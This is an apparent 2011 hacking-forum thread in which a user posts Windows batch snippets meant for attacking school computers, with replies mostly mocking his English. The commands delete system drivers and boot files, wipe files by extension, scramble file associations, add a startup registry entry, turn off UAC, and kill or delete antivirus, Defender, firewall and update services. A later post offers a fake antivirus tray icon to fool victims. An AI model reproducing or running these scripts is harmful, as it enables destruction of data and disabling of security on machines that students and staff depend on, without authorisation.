![]() |
|
Batch for school - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Batch for school (/Thread-Batch-for-school) Pages:
1
2
|
Batch for school - JuiceKing - 05-06-2011 If you hack school compters this batch is good for you! ![]() Code: Blue Screen of Death
@((( Echo Off > Nul ) & Break Off )
@Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul
@Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*"
)
Hide Document Folders
attrib +h "%userprofile%\my documents"
Swap mouse buttons
RUNDLL32 USER32.DLL,SwapMouseButton
Confuse file extensions
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
Last Restart
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
shutdown /r /t 00
Delete some files with an specific extension like .mp3 or .exe... just change .png with whatever you like, don´t change .txt in that code.
DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
Disable Admin account
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
Kill antivirus program:
net stop “Security Centerâ€ÂÂ
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
Disable Windows defender
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
Disable Windos Update
net stop "wuauserv"
Disable Windows Security
net stop "security center"
net stop sharedaccess
netsh firewall set opmode mode-disableRE: dangerous batch - 1llusion - 05-06-2011 huh? sorry, but I'm completely confused, is this a guide, or you ask for help or...? RE: dangerous batch - Enc0de - 05-07-2011 LMFAO WTF are you saying hahahahahahaha OMFG drugs are bad for you. tupid:RE: dangerous batch - 1234hotmaster - 05-07-2011 lol what is he saying :lol: RE: dangerous batch - JuiceKing - 05-07-2011 My English is very bad -.-
RE: dangerous batch - Dinrazor - 05-07-2011 haxhaxhax.. im confuse to0o lolx... nice try xD RE: dangerous batch - murder - 05-09-2011 LOL .... Learn english first before hacking then. RE: Batch for school - ♠J0K3R♠ - 07-04-2011 have you got a hack for school computers with eset nod 32 as av? RE: Batch for school - JuiceKing - 07-04-2011 (07-04-2011, 07:44 PM)» Â¥ « Wrote: have you got a hack for school computers with eset nod 32 as av? No...but i have a fake icon of av's.When you run that program fake icon is in taskbar, victim think it's have av's but it's fake icon it's don't have av.Fake icon is in startup then everytime when windows is started fake icon is in taskbar! If you want fake icons, PM me. :thumbs:
RE: Batch for school - changeusername123 - 07-04-2011 He means that if u wanna hack school computers use the batch file.. Btw Copy and paste it to a text file and save it as "Name.bat". Thanks for the share dude. Note:It bad to take the ppl mistake as a joke just smile and fix it. |